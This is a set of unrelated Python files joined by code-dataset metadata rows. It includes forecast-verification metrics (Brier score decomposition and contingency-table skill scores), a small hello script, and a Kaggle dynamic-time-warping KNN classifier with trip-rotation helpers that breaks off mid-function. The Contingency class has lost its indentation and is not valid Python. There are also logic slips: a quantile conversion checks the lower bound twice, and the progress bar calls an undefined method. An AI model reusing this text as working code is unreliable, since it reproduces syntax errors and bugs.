   """ Brier score: mean squared difference between forecast probability and
   the binary observation """
   type = verif.metric_type.Probabilistic()
   name = "Brier score"
   description = "Brier score"
   min = 0
   max = 1
   default_axis = verif.axis.Threshold()
   require_threshold_type = "threshold"
   supports_threshold = True
   perfect_score = 0
   orientation = -1
   reference = "Glenn W. Brier, 1950: Verification of forecasts expressed in terms of probability. Mon. Wea. Rev., 78, 1-3."

   def compute_single(self, data, input_index, axis, axis_index, interval):
      """ Compute probabilities based on thresholds """
      [obsP, p] = get_p(data, input_index, axis, axis_index, interval)
      return self.compute_from_obs_fcst(obsP, p)

   def compute_from_obs_fcst(self, obs, fcst):
      """ Mean squared probability error; obs is binary, fcst in [0, 1] """
      # Removed dead code: an unused nan-array was allocated here
      return np.nanmean((fcst - obs) ** 2)

   def label(self, variable):
      return self.name
class BsRel(Metric):
   """ Reliability term of the Brier score decomposition """
   default_axis = verif.axis.Threshold()
   type = verif.metric_type.Probabilistic()
   # FIX: name said "brier skill score" (lowercase, and this is a term of the
   # Brier score, not the skill score); aligned with description and BsRes
   name = "Brier score, reliability term"
   description = "Brier score, reliability term"
   min = 0
   max = 1
   require_threshold_type = "threshold"
   supports_threshold = True
   perfect_score = 0
   orientation = -1

   def __init__(self, num_edges=11):
      self._edges = np.linspace(0, 1, num_edges)
      # Extend the last edge so that p == 1 falls in the final bin
      self._edges[-1] = 1.001

   def compute_single(self, data, input_index, axis, axis_index, interval):
      [obsP, p] = get_p(data, input_index, axis, axis_index, interval)
      return self.compute_from_obs_fcst(obsP, p)

   def compute_from_obs_fcst(self, obs, fcst):
      """ Squared distance between each probability bin's forecast value and
      its observed frequency, averaged over all forecasts """
      bs = np.nan * np.zeros(len(fcst), 'float')
      # Removed dead code: obs_mean was computed but never used
      """
      Break p into bins, and compute reliability. but save each reliability
      value in an array the same size as fcst. In this way we do not need to do
      a weighted average
      """
      for i in range(0, len(self._edges) - 1):
         I = np.where((fcst >= self._edges[i]) & (fcst < self._edges[i + 1]))[0]
         if len(I) > 0:
            obs_mean_I = np.mean(obs[I])
            bs[I] = (fcst[I] - obs_mean_I) ** 2
      return np.nanmean(bs)

   def label(self, variable):
      return self.name
class BsRes(Metric):
   """ Resolution term of the Brier score decomposition """
   default_axis = verif.axis.Threshold()
   type = verif.metric_type.Probabilistic()
   name = "Brier score, resolution term"
   description = "Brier score, resolution term"
   min = 0
   max = 1
   require_threshold_type = "threshold"
   supports_threshold = True
   perfect_score = 1
   orientation = 1

   def __init__(self, num_edges=11):
      self._edges = np.linspace(0, 1, num_edges)
      # Extend the last edge so that p == 1 falls in the final bin
      self._edges[-1] = 1.001

   def compute_single(self, data, input_index, axis, axis_index, interval):
      [obsP, p] = get_p(data, input_index, axis, axis_index, interval)
      return self.compute_from_obs_fcst(obsP, p)

   def compute_from_obs_fcst(self, obs, fcst):
      """ Squared distance between each bin's observed frequency and the
      overall base rate, averaged over all forecasts """
      res = np.nan * np.zeros(len(fcst), 'float')
      base_rate = np.mean(obs)
      for i in range(len(self._edges) - 1):
         in_bin = np.where((fcst >= self._edges[i]) & (fcst < self._edges[i + 1]))[0]
         if len(in_bin) > 0:
            res[in_bin] = (np.mean(obs[in_bin]) - base_rate) ** 2
      return np.nanmean(res)

   def label(self, variable):
      return self.name
class BsUnc(Metric):
   """ Uncertainty term of the Brier score decomposition """
   default_axis = verif.axis.Threshold()
   type = verif.metric_type.Probabilistic()
   name = "Brier score, uncertainty term"
   description = "Brier score, uncertainty term"
   min = 0
   max = 1
   require_threshold_type = "threshold"
   supports_threshold = True
   perfect_score = None
   orientation = 0

   def compute_single(self, data, input_index, axis, axis_index, interval):
      [obsP, p] = get_p(data, input_index, axis, axis_index, interval)
      return self.compute_from_obs_fcst(obsP, p)

   def compute_from_obs_fcst(self, obs, fcst):
      # Variance of the binary observations: mean((base_rate - obs)^2)
      base_rate = np.mean(obs)
      return np.nanmean((base_rate - obs) ** 2)

   def label(self, variable):
      return self.name
class Bss(Metric):
   """ Brier skill score relative to climatology (the uncertainty term) """
   default_axis = verif.axis.Threshold()
   type = verif.metric_type.Probabilistic()
   name = "Brier skill score"
   description = "Brier skill score"
   min = 0
   max = 1
   require_threshold_type = "threshold"
   supports_threshold = True
   perfect_score = 1
   orientation = 1

   def compute_single(self, data, input_index, axis, axis_index, interval):
      [obsP, p] = get_p(data, input_index, axis, axis_index, interval)
      return self.compute_from_obs_fcst(obsP, p)

   def compute_from_obs_fcst(self, obs, fcst):
      # Skill relative to the climatological (uncertainty) score
      bs = np.nanmean((fcst - obs) ** 2)
      base_rate = np.mean(obs)
      bs_climatology = np.nanmean((base_rate - obs) ** 2)
      if bs_climatology == 0:
         return np.nan
      return (bs_climatology - bs) / bs_climatology

   def label(self, variable):
      return self.name
class QuantileScore(Metric):
   """ Quantile (pinball) score for a set of forecast quantiles """
   type = verif.metric_type.Probabilistic()
   name = "Quantile score"
   description = "Quantile score. Use -q to set which quantiles to use."
   min = 0
   require_threshold_type = "quantile"
   supports_threshold = True
   perfect_score = 0
   orientation = -1

   def compute_single(self, data, input_index, axis, axis_index, interval):
      [obs, q] = get_q(data, input_index, axis, axis_index, interval)
      # Pinball loss: (q - obs) * (tau - 1{q - obs < 0}) with quantile level
      # tau = interval.lower.
      # Removed dead code: an unused nan-array was allocated here.
      v = q - obs
      qs = v * (interval.lower - (v < 0))
      return np.mean(qs)

   def label(self, variable):
      return self.name
class Ign0(Metric):
   """ Ignorance (logarithmic) score of the binary event probability """
   type = verif.metric_type.Probabilistic()
   name = "Binary ignorance"
   description = "Ignorance of the binary probability based on threshold"
   require_threshold_type = "threshold"
   supports_threshold = True
   orientation = -1

   def compute_single(self, data, input_index, axis, axis_index, interval):
      [obsP, p] = get_p(data, input_index, axis, axis_index, interval)
      # -log2 of the probability assigned to the observed outcome.
      # Note: a probability of exactly 0 (or 1 for non-events) yields inf.
      # Removed dead code: I1 was computed but never used.
      I0 = np.where(obsP == 0)[0]
      ign = -np.log2(p)
      ign[I0] = -np.log2(1 - p[I0])
      return np.mean(ign)

   def label(self, variable):
      return self.name
class Spherical(Metric):
   """ Spherical proper scoring rule for binary events """
   type = verif.metric_type.Probabilistic()
   name = "Spherical score"
   description = "Spherical probabilistic scoring rule for binary events"
   require_threshold_type = "threshold"
   supports_threshold = True
   max = 1
   min = 0
   perfect_score = 1
   orientation = 1

   def compute_single(self, data, input_index, axis, axis_index, interval):
      [obsP, p] = get_p(data, input_index, axis, axis_index, interval)
      # Probability of the observed outcome divided by the Euclidean norm of
      # the probability vector (p, 1-p).
      # Removed dead code: I1 was computed but never used.
      I0 = np.where(obsP == 0)[0]
      sp = p / np.sqrt(p ** 2 + (1 - p) ** 2)
      sp[I0] = (1 - p[I0]) / np.sqrt((p[I0]) ** 2 + (1 - p[I0]) ** 2)
      return np.mean(sp)

   def label(self, variable):
      return self.name
class Contingency(Metric):
"""
Metrics based on 2x2 contingency table for a given interval. Observations
and forecasts are converted into binary values, that is if they are within
or not within an interval.
"""
type = verif.metric_type.Threshold()
min = 0
max = 1
default_axis = verif.axis.Threshold()
require_threshold_type = "deterministic"
supports_threshold = True
_usingQuantiles = False
def compute_from_abcd(self, a, b, c, d):
""" Compute the score given the 4 values in the 2x2 contingency table:
Arguments:
a (float): Hit
b (float): False alarm
c (float): Miss
d (float): Correct rejection
Returns:
float: The score
"""
raise NotImplementedError()
def label(self, variable):
return self.name
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([verif.field.Obs(), verif.field.Fcst()], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def _quantile_to_threshold(self, values, interval):
"""
Convert an interval of quantiles to interval thresholds, for example
converting [10%, 50%] of some precip values to [5 mm, 25 mm]
Arguments:
values (np.array): values to compute thresholds for
interval (verif.interval.Interval): interval of quantiles
Returns:
verif.interval.Interval: Interval of thresholds
"""
sorted = np.sort(values)
lower = -np.inf
upper = np.inf
if not np.isinf(abs(interval.lower)):
lower = np.percentile(sorted, interval.lower * 100)
if not np.isinf(abs(interval.lower)):
upper = np.percentile(sorted, interval.upper * 100)
return verif.interval.Interval(lower, upper, interval.lower_eq, interval.upper_eq)
def _compute_abcd(self, obs, fcst, interval, f_interval=None):
if f_interval is None:
f_interval = interval
value = np.nan
if len(fcst) > 0:
# Compute frequencies
if self._usingQuantiles:
fcstSort = np.sort(fcst)
obsSort = np.sort(obs)
f_qinterval = self._quantile_to_threshold(fcstSort, f_interval)
o_qinterval = self._quantile_to_threshold(obsSort, interval)
a = np.ma.sum(f_qinterval.within(fcst) & o_qinterval.within(obs)) # Hit
b = np.ma.sum(f_qinterval.within(fcst) & (o_qinterval.within(obs) == 0)) # FA
c = np.ma.sum((f_qinterval.within(fcst) == 0) & o_qinterval.within(obs)) # Miss
d = np.ma.sum((f_qinterval.within(fcst) == 0) & (o_qinterval.within(obs) == 0)) # CR
else:
a = np.ma.sum(f_interval.within(fcst) & interval.within(obs)) # Hit
b = np.ma.sum(f_interval.within(fcst) & (interval.within(obs) == 0)) # FA
c = np.ma.sum((f_interval.within(fcst) == 0) & interval.within(obs)) # Miss
d = np.ma.sum((f_interval.within(fcst) == 0) & (interval.within(obs) == 0)) # CR
return [a, b, c, d]
def compute_from_obs_fcst(self, obs, fcst, interval, f_interval=None):
""" Computes the score
Arguments:
obs (np.array): array of observations
fcst (np.array): array of forecasts
interval (verif.interval.Interval): compute score for this interval
f_interval (verif.interval.Interval): Use this interval for forecasts.
If None, then use the same interval for obs and forecasts.
Returns:
float: The score
"""
[a, b, c, d] = self._compute_abcd(obs, fcst, interval, f_interval)
value = self.compute_from_abcd(a, b, c, d)
if np.isinf(value):
value = np.nan
return value
def compute_from_obs_fcst_resample(self, obs, fcst, N, interval, f_interval=None):
    """
    Same as compute_from_obs_fcst, except compute more robust scores by
    resampling (with replacement) using the computed values of a, b, c, d.

    Arguments:
       obs (np.array): array of observations
       fcst (np.array): array of forecasts
       N (int): Resample this many times
       interval (verif.interval.Interval): compute score for this interval
       f_interval (verif.interval.Interval): Use this interval for forecasts.
          If None, then use the same interval for obs and forecasts.

    Returns:
       float: The score (np.nan when the table is empty)
    """
    [a, b, c, d] = self._compute_abcd(obs, fcst, interval, f_interval)

    n = a + b + c + d
    if n == 0:
        # No cases at all: the resampling probabilities a/n etc. are undefined
        return np.nan

    # Use a local generator instead of np.random.seed(1) so the global numpy
    # RNG state is not clobbered as a side effect. RandomState(1) produces
    # the same stream the original produced after np.random.seed(1).
    rng = np.random.RandomState(1)
    value = 0
    for _ in range(N):
        aa = rng.binomial(n, 1.0 * a / n)
        bb = rng.binomial(n, 1.0 * b / n)
        cc = rng.binomial(n, 1.0 * c / n)
        dd = rng.binomial(n, 1.0 * d / n)
        value = value + self.compute_from_abcd(aa, bb, cc, dd)
    return value / N
def label(self, variable):
    """Return the axis label for this metric (its name).

    The `variable` argument is accepted for interface compatibility with
    other metrics' label() methods but is not used here.
    """
    return self.name
class A(Contingency):
    """Fraction of hits: a / (a + b + c + d)."""
    name = "Hit"
    description = "Hit"

    def compute_from_abcd(self, a, b, c, d):
        # Guard against an empty table (consistent with BaseRate)
        if a + b + c + d == 0:
            return np.nan
        return 1.0 * a / (a + b + c + d)
class B(Contingency):
    """Fraction of false alarms: b / (a + b + c + d)."""
    name = "False alarm"
    description = "False alarm"

    def compute_from_abcd(self, a, b, c, d):
        # Guard against an empty table (consistent with BaseRate)
        if a + b + c + d == 0:
            return np.nan
        return 1.0 * b / (a + b + c + d)
class C(Contingency):
    """Fraction of misses: c / (a + b + c + d)."""
    name = "Miss"
    description = "Miss"

    def compute_from_abcd(self, a, b, c, d):
        # Guard against an empty table (consistent with BaseRate)
        if a + b + c + d == 0:
            return np.nan
        return 1.0 * c / (a + b + c + d)
class D(Contingency):
    """Fraction of correct rejections: d / (a + b + c + d)."""
    name = "Correct rejection"
    description = "Correct rejection"

    def compute_from_abcd(self, a, b, c, d):
        # Guard against an empty table (consistent with BaseRate)
        if a + b + c + d == 0:
            return np.nan
        return 1.0 * d / (a + b + c + d)
class N(Contingency):
    """Total number of cases in the contingency table."""
    name = "Total cases"
    description = "Total cases"
    max = None

    def compute_from_abcd(self, a, b, c, d):
        # The table size is simply the sum of all four cells
        return sum([a, b, c, d])
class Ets(Contingency):
    """Equitable threat score (Gilbert skill score)."""
    name = "Equitable threat score"
    description = "Equitable threat score"
    perfect_score = 1
    orientation = 1

    def compute_from_abcd(self, a, b, c, d):
        N = a + b + c + d
        if N == 0:
            # Empty table: hits-by-chance is undefined (avoids division by 0)
            return np.nan
        # Expected number of hits obtained by random chance
        ar = (a + b) / 1.0 / N * (a + c)
        if a + b + c - ar == 0:
            return np.nan
        return (a - ar) / 1.0 / (a + b + c - ar)

    def label(self, variable):
        return "ETS"
class FcstRate(Contingency):
    """Fraction of cases that were forecast as events: (a + b) / total."""
    name = "Forecast rate"
    description = "Fractions of forecasts (a + b)"
    perfect_score = None
    orientation = 0

    def compute_from_abcd(self, a, b, c, d):
        # Guard against an empty table (consistent with BaseRate)
        if a + b + c + d == 0:
            return np.nan
        return (a + b) / 1.0 / (a + b + c + d)
class Dscore(Contingency):
    """Generalized discrimination score (Mason and Weigel, 2009)."""
    name = "Discrimination"  # fixed typo: was "Discimination"
    description = "Generalized discrimination score"
    perfect_score = 1
    orientation = 1
    reference = "Simon J. Mason and Andreas P. Weigel, 2009: A Generic Forecast Verification Framework for Administrative Purposes. Mon. Wea. Rev., 137, 331-349."
    max = 1
    min = 0

    def compute_from_abcd(self, a, b, c, d):
        # (the original computed N = a+b+c+d but never used it)
        num = a * d + 0.5 * (a * b + c * d)
        denom = (a + c) * (b + d)
        if denom == 0:
            return np.nan
        return num / denom
class Threat(Contingency):
    """Threat score (critical success index): a / (a + b + c)."""
    name = "Threat score"
    description = "Threat score"
    perfect_score = 1
    orientation = 1

    def compute_from_abcd(self, a, b, c, d):
        denom = a + b + c
        if denom == 0:
            return np.nan
        return a / 1.0 / denom
class Pc(Contingency):
    """Proportion of correct classifications: (a + d) / total."""
    name = "Proportion correct"
    description = "Proportion correct"
    perfect_score = 1
    orientation = 1

    def compute_from_abcd(self, a, b, c, d):
        # Guard against an empty table (consistent with BaseRate)
        if a + b + c + d == 0:
            return np.nan
        return (a + d) / 1.0 / (a + b + c + d)
class Edi(Contingency):
    """Extremal dependency index (Ferro and Stephenson, 2011)."""
    name = "Extremal dependency index"
    description = "Extremal dependency index"
    perfect_score = 1
    orientation = 1
    reference = "Christopher A. T. Ferro and David B. Stephenson, 2011: Extremal Dependence Indices: Improved Verification Measures for Deterministic Forecasts of Rare Binary Events. Wea. Forecasting, 26, 699-713."

    def compute_from_abcd(self, a, b, c, d):
        # (the original computed N = a+b+c+d but never used it)
        if b + d == 0 or a + c == 0:
            return np.nan
        F = b / 1.0 / (b + d)  # false alarm rate
        H = a / 1.0 / (a + c)  # hit rate
        if H == 0 or F == 0:
            return np.nan
        denom = (np.log(H) + np.log(F))
        if denom == 0:
            return np.nan
        return (np.log(F) - np.log(H)) / denom

    def label(self, variable):
        return "EDI"
class Sedi(Contingency):
    """Symmetric extremal dependency index (Ferro and Stephenson, 2011)."""
    name = "Symmetric extremal dependency index"
    description = "Symmetric extremal dependency index"
    perfect_score = 1
    orientation = 1
    reference = Edi.reference

    def compute_from_abcd(self, a, b, c, d):
        # (the original computed N = a+b+c+d but never used it)
        if b + d == 0 or a + c == 0:
            return np.nan
        F = b / 1.0 / (b + d)  # false alarm rate
        H = a / 1.0 / (a + c)  # hit rate
        # log(F), log(1-F), log(H), log(1-H) must all be finite
        if F == 0 or F == 1 or H == 0 or H == 1:
            return np.nan
        denom = np.log(F) + np.log(H) + np.log(1 - F) + np.log(1 - H)
        if denom == 0:
            return np.nan
        num = np.log(F) - np.log(H) - np.log(1 - F) + np.log(1 - H)
        return num / denom

    def label(self, variable):
        return "SEDI"
class Eds(Contingency):
    """Extreme dependency score (Stephenson et al., 2008)."""
    name = "Extreme dependency score"
    description = "Extreme dependency score"
    min = None
    perfect_score = 1
    orientation = 1
    reference = "Stephenson, D. B., B. Casati, C. A. T. Ferro, and C. A. Wilson, 2008: The extreme dependency score: A non-vanishing measure for forecasts of rare events. Meteor. Appl., 15, 41-50."

    def compute_from_abcd(self, a, b, c, d):
        total = a + b + c + d
        if a + c == 0:
            return np.nan
        hit_rate = a / 1.0 / (a + c)
        base_rate = (a + c) / 1.0 / total
        if hit_rate == 0 or base_rate == 0:
            return np.nan
        denominator = np.log(base_rate) + np.log(hit_rate)
        if denominator == 0:
            return np.nan
        return (np.log(base_rate) - np.log(hit_rate)) / denominator

    def label(self, variable):
        return "EDS"
class Seds(Contingency):
    """Symmetric extreme dependency score."""
    name = "Symmetric extreme dependency score"
    description = "Symmetric extreme dependency score"
    min = None
    perfect_score = 1
    orientation = 1

    def compute_from_abcd(self, a, b, c, d):
        N = a + b + c + d
        if a + c == 0:
            return np.nan
        H = a / 1.0 / (a + c)   # hit rate
        p = (a + c) / 1.0 / N   # observed base rate
        q = (a + b) / 1.0 / N   # forecast rate
        if q == 0 or H == 0:
            return np.nan
        denom = np.log(p) + np.log(H)
        if denom == 0:
            return np.nan
        # Reuse the denominator checked above (the original recomputed
        # np.log(p) + np.log(H) inline in the return statement)
        return (np.log(q) - np.log(H)) / denom

    def label(self, variable):
        return "SEDS"
class BiasFreq(Contingency):
    """Frequency bias: number of forecast events over number of observed events."""
    name = "Bias frequency"
    description = "Bias frequency (number of fcsts / number of obs)"
    max = None
    perfect_score = 1
    orientation = 0

    def compute_from_abcd(self, a, b, c, d):
        observed_events = a + c
        if observed_events == 0:
            return np.nan
        return 1.0 * (a + b) / observed_events
class Hss(Contingency):
    """Heidke skill score."""
    # `name` was missing; every sibling metric defines it and the inherited
    # label() returns self.name
    name = "Heidke skill score"
    max = None
    description = "Heidke skill score"
    perfect_score = 1
    orientation = 1

    def compute_from_abcd(self, a, b, c, d):
        denom = ((a + c) * (c + d) + (a + b) * (b + d))
        if denom == 0:
            return np.nan
        return 2.0 * (a * d - b * c) / denom
class BaseRate(Contingency):
    """Climatological event frequency: (a + c) / total."""
    name = "Base rate"
    description = "Base rate: Fraction of observations (a + c)"
    perfect_score = None
    orientation = 0

    def compute_from_abcd(self, a, b, c, d):
        total = a + b + c + d
        if total == 0:
            return np.nan
        return (a + c) / 1.0 / total
class Or(Contingency):
    """Odds ratio: (a * d) / (b * c)."""
    name = "Odds ratio"
    description = "Odds ratio"
    max = None
    perfect_score = None  # Should be infinity
    orientation = 1

    def compute_from_abcd(self, a, b, c, d):
        denom = b * c
        if denom == 0:
            return np.nan
        return (a * d) / 1.0 / denom
class Lor(Contingency):
    """Natural logarithm of the odds ratio."""
    name = "Log odds ratio"
    description = "Log odds ratio"
    max = None
    perfect_score = None  # Should be infinity
    orientation = 1

    def compute_from_abcd(self, a, b, c, d):
        # Both products must be nonzero for the log of the ratio to be finite
        if a * d == 0 or b * c == 0:
            return np.nan
        odds_ratio = (a * d) / 1.0 / (b * c)
        return np.log(odds_ratio)
class YulesQ(Contingency):
    """Yule's Q, the odds ratio skill score: (ad - bc) / (ad + bc)."""
    name = "Yule's Q"
    description = "Yule's Q (Odds ratio skill score)"
    perfect_score = 1
    orientation = 1

    def compute_from_abcd(self, a, b, c, d):
        hits_product = a * d
        errors_product = b * c
        if hits_product + errors_product == 0:
            return np.nan
        return (hits_product - errors_product) / 1.0 / (hits_product + errors_product)
class Kss(Contingency):
    """Hanssen-Kuiper skill score: (ad - bc) / ((a + c)(b + d))."""
    name = "Hanssen-Kuiper skill score"
    description = "Hanssen-Kuiper skill score"
    perfect_score = 1
    orientation = 1
    reference = "Hanssen , A., W. Kuipers, 1965: On the relationship between the frequency of rain and various meteorological parameters. - Meded. Verh. 81, 2-15."

    def compute_from_abcd(self, a, b, c, d):
        denom = (a + c) * (b + d)
        if denom == 0:
            return np.nan
        return (a * d - b * c) * 1.0 / denom
class Hit(Contingency):
    """Hit rate (probability of detection): a / (a + c)."""
    name = "Hit rate"
    description = "Hit rate (a.k.a. probability of detection)"
    perfect_score = 1
    orientation = 1

    def compute_from_abcd(self, a, b, c, d):
        observed_events = a + c
        if observed_events == 0:
            return np.nan
        return a / 1.0 / observed_events
class Miss(Contingency):
    """Miss rate: c / (a + c)."""
    name = "Miss rate"
    description = "Miss rate"
    perfect_score = 0
    orientation = -1

    def compute_from_abcd(self, a, b, c, d):
        observed_events = a + c
        if observed_events == 0:
            return np.nan
        return c / 1.0 / observed_events
# Fraction of non-events that are forecasted as events
class Fa(Contingency):
    """False alarm rate: fraction of non-events forecast as events, b / (b + d)."""
    name = "False alarm rate"
    description = "False alarm rate"
    perfect_score = 0
    orientation = -1

    def compute_from_abcd(self, a, b, c, d):
        non_events = b + d
        if non_events == 0:
            return np.nan
        return b / 1.0 / non_events
# Fraction of forecasted events that are false alarms
class Far(Contingency):
    """False alarm ratio: fraction of forecast events that were false alarms, b / (a + b)."""
    name = "False alarm ratio"
    description = "False alarm ratio"
    perfect_score = 0
    orientation = -1

    def compute_from_abcd(self, a, b, c, d):
        forecast_events = a + b
        if forecast_events == 0:
            return np.nan
        return b / 1.0 / forecast_events
| [
"tnipen@gmail.com"
] | tnipen@gmail.com |
01a5db57895c627d4f4362a14b97c9cfaf4afbb9 | 5921824c554cfa26c69b8aaa8c4e7cbff4ed06f7 | /hello.py | 926ce1b515353e86659548257f6ab8b1e442339e | [] | no_license | Robbiesmalls/sample | d4e59d1b59c3bb9f6b313fa11131496128b8bf6a | 89e330c6387a7223b4cc11381b318d8f9c58386f | refs/heads/master | 2020-04-25T11:54:34.001253 | 2019-02-26T17:48:13 | 2019-02-26T17:48:13 | 172,760,897 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 88 | py | def hello_world():
print("hello guys")
def hello_steve():
    """Print a greeting for Steve."""
    print('hello steve')
| [
"drj@ool-ad020142.dyn.optonline.net"
] | drj@ool-ad020142.dyn.optonline.net |
953809a2bf985cd1146dd41176b21eb54db687e8 | 05eae99986fa20dfcda910e55de60b179b8aa870 | /Code/bitte90.py | 08386480ac534198ba3f5af3c1d2f8011db994f8 | [] | no_license | caigaojiang/awesome-kagg-ml | e4f8809b287361a8637c4d13b0c4211f879726cc | 7825a502111c2f8517e4ba2909cc95ef3758a2e9 | refs/heads/master | 2020-12-28T22:23:20.051872 | 2016-04-10T12:22:41 | 2016-04-10T12:22:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,647 | py | from __future__ import division
import sys
import collections
import itertools
from scipy.stats import mode
import pandas as pd
import numpy as np
from os import listdir, path
import multiprocessing as mp
import h5py
try:
from IPython.display import clear_output
have_ipython = True
except ImportError:
have_ipython = False
class KnnDtw(object):
    """K-nearest neighbor classifier using dynamic time warping
    as the distance measure between pairs of time series arrays

    Arguments
    ---------
    n_neighbors : int, optional (default = 1)
        Number of neighbors to use by default for KNN

    max_warping_window : int, optional (default = 50)
        Maximum warping window allowed by the DTW dynamic
        programming function

    subsample_step : int, optional (default = 20)
        Step size for the timeseries array. By setting subsample_step = 2,
        the timeseries length will be reduced by 50% because every second
        item is skipped. Implemented by x[:, ::subsample_step]
    """

    def __init__(self, n_neighbors=1, max_warping_window=50, subsample_step=20):
        self.n_neighbors = n_neighbors
        self.max_warping_window = max_warping_window
        self.subsample_step = subsample_step

    def fit(self, x, l):
        """Fit the model using x as training data and l as class labels

        Arguments
        ---------
        x : array of shape [n_samples, n_timepoints]
            Training data set for input into KNN classifer

        l : array of shape [n_samples]
            Training labels for input into KNN classifier
        """
        self.x = x
        self.l = l

    def _dtw_distance(self, ts_a, ts_b, d=lambda x, y: abs(x - y)):
        """Returns the DTW similarity distance between two 2-D
        timeseries numpy arrays.

        Arguments
        ---------
        ts_a, ts_b : array of shape [n_samples, n_timepoints]
            Two arrays containing n_samples of timeseries data
            whose DTW distance between each sample of A and B
            will be compared

        d : DistanceMetric object (default = abs(x-y))
            the distance measure used for A_i - B_j in the
            DTW dynamic programming function

        Returns
        -------
        DTW distance between A and B
        """
        # Create cost matrix initialized with a large value so that cells
        # outside the warping window never win the min() below
        ts_a, ts_b = np.array(ts_a), np.array(ts_b)
        M, N = len(ts_a), len(ts_b)
        cost = sys.maxint * np.ones((M, N))

        # Initialize the first row and column
        cost[0, 0] = d(ts_a[0], ts_b[0])
        for i in xrange(1, M):
            cost[i, 0] = cost[i - 1, 0] + d(ts_a[i], ts_b[0])
        for j in xrange(1, N):
            cost[0, j] = cost[0, j - 1] + d(ts_a[0], ts_b[j])

        # Populate rest of cost matrix within window
        for i in xrange(1, M):
            for j in xrange(max(1, i - self.max_warping_window),
                            min(N, i + self.max_warping_window)):
                choices = cost[i - 1, j - 1], cost[i, j - 1], cost[i - 1, j]
                cost[i, j] = min(choices) + d(ts_a[i], ts_b[j])

        # Return DTW distance given window
        return cost[-1, -1]

    def _dist_matrix(self, x, y):
        """Computes the M x N distance matrix between the training
        dataset and testing dataset (y) using the DTW distance measure

        Arguments
        ---------
        x : array of shape [n_samples, n_timepoints]
        y : array of shape [n_samples, n_timepoints]

        Returns
        -------
        Distance matrix between each item of x and y with
        shape [training_n_samples, testing_n_samples]
        """
        dm_count = 0

        # Compute condensed distance matrix (upper triangle) of pairwise dtw
        # distances when x and y are the same array
        if np.array_equal(x, y):
            # Fixed: the original called the undefined bare names shape()
            # and squareform(); use np.shape and scipy's squareform
            from scipy.spatial.distance import squareform

            x_s = np.shape(x)
            dm = np.zeros((x_s[0] * (x_s[0] - 1)) // 2, dtype=np.double)

            p = ProgressBar(np.shape(dm)[0])
            for i in xrange(0, x_s[0] - 1):
                for j in xrange(i + 1, x_s[0]):
                    dm[dm_count] = self._dtw_distance(x[i, ::self.subsample_step],
                                                      y[j, ::self.subsample_step])
                    dm_count += 1
                    p.animate(dm_count)

            # Convert to squareform
            dm = squareform(dm)
            return dm

        # Compute full distance matrix of dtw distances between x and y
        else:
            x_s = np.shape(x)
            y_s = np.shape(y)
            dm = np.zeros((x_s[0], y_s[0]))
            dm_size = x_s[0] * y_s[0]

            p = ProgressBar(dm_size)
            for i in xrange(0, x_s[0]):
                for j in xrange(0, y_s[0]):
                    dm[i, j] = self._dtw_distance(x[i, ::self.subsample_step],
                                                  y[j, ::self.subsample_step])
                    # Update progress bar
                    dm_count += 1
                    p.animate(dm_count)

            return dm

    def predict(self, x):
        """Predict the class labels or probability estimates for
        the provided data

        Arguments
        ---------
        x : array of shape [n_samples, n_timepoints]
            Array containing the testing data set to be classified

        Returns
        -------
        2 arrays representing:
            (1) the predicted class labels
            (2) the knn label count probability
        """
        dm = self._dist_matrix(x, self.x)

        # Identify the k nearest neighbors
        knn_idx = dm.argsort()[:, :self.n_neighbors]

        # Identify k nearest labels
        knn_labels = self.l[knn_idx]

        # Model Label: majority vote among the k nearest labels
        mode_data = mode(knn_labels, axis=1)
        mode_label = mode_data[0]
        mode_proba = mode_data[1] / self.n_neighbors
        return mode_label.ravel(), mode_proba.ravel()
class ProgressBar:
    """This progress bar was taken from PYMC
    """
    def __init__(self, iterations):
        # Total number of iterations the bar represents
        self.iterations = iterations
        self.prog_bar = '[]'
        self.fill_char = '*'
        self.width = 40
        self.__update_amount(0)
        # NOTE(review): animate_noipython is referenced here but never
        # defined anywhere in this class; the non-IPython path would raise
        # AttributeError -- confirm whether it was dropped accidentally.
        if have_ipython:
            self.animate = self.animate_ipython
        else:
            self.animate = self.animate_noipython

    def animate_ipython(self, iter):
        # Python 2 print statement: redraw the bar in place on the same line
        print '\r', self,
        sys.stdout.flush()
        self.update_iteration(iter + 1)

    def update_iteration(self, elapsed_iter):
        # Recompute the bar, then append the "x of y complete" suffix
        self.__update_amount((elapsed_iter / float(self.iterations)) * 100.0)
        self.prog_bar += '  %d of %s complete' % (elapsed_iter, self.iterations)

    def __update_amount(self, new_amount):
        # Rebuild the bar string and overlay the percentage in the middle
        percent_done = int(round((new_amount / 100.0) * 100.0))
        all_full = self.width - 2
        num_hashes = int(round((percent_done / 100.0) * all_full))
        self.prog_bar = '[' + self.fill_char * num_hashes + ' ' * (all_full - num_hashes) + ']'
        pct_place = (len(self.prog_bar) // 2) - len(str(percent_done))
        pct_string = '%d%%' % percent_done
        self.prog_bar = self.prog_bar[0:pct_place] + \
            (pct_string + self.prog_bar[pct_place + len(pct_string):])

    def __str__(self):
        return str(self.prog_bar)
##################################################
def rotational(theta):
    """Return the 2x2 matrix [[-sin(theta), cos(theta)], [cos(theta), sin(theta)]].

    See http://en.wikipedia.org/wiki/Rotation_matrix. Beyond a rotation
    matrix, flipping, scaling and shear can be combined into a single affine
    transform:
    http://en.wikipedia.org/wiki/Affine_transformation#mediaviewer/File:2D_affine_transformation_matrix.svg
    """
    s = np.sin(theta)
    c = np.cos(theta)
    return np.array([[-s, c], [c, s]])
def flip(x):
    """Mirror a trip about the x-axis when most points lie above it.

    If more than half of the coordinates have a positive y value, the y
    column is negated; the result is always returned as a DataFrame with
    columns 'x' and 'y'.
    """
    mostly_above_axis = np.sign(x[:, 1]).sum() > 0
    if mostly_above_axis:
        x = x.dot(np.array([[1, 0], [0, -1]]))
    return pd.DataFrame(x, columns=['x', 'y'])
def rotate_trip(trip):
    """Rotate a trip according to the heading of its final point.

    The angle from the origin to the trip's last element determines the
    rotation, applied via rotational(); equivalent to
    rotational(-w0).dot(trip.T).T.
    """
    end_point = trip.iloc[-1]
    heading = np.arctan2(end_point.y, end_point.x)
    return np.array(trip.dot(rotational(heading)))
def do_job(i, chunk):
    """Process one chunk file: compute each driver's trip-similarity matrix
    and write it to its own HDF5 file in matched_trips_path."""
    frame = pd.read_hdf(path.join(chunk_path, chunk), key = 'table')
    grouped_by_driver = frame.groupby(level = ['Driver'])
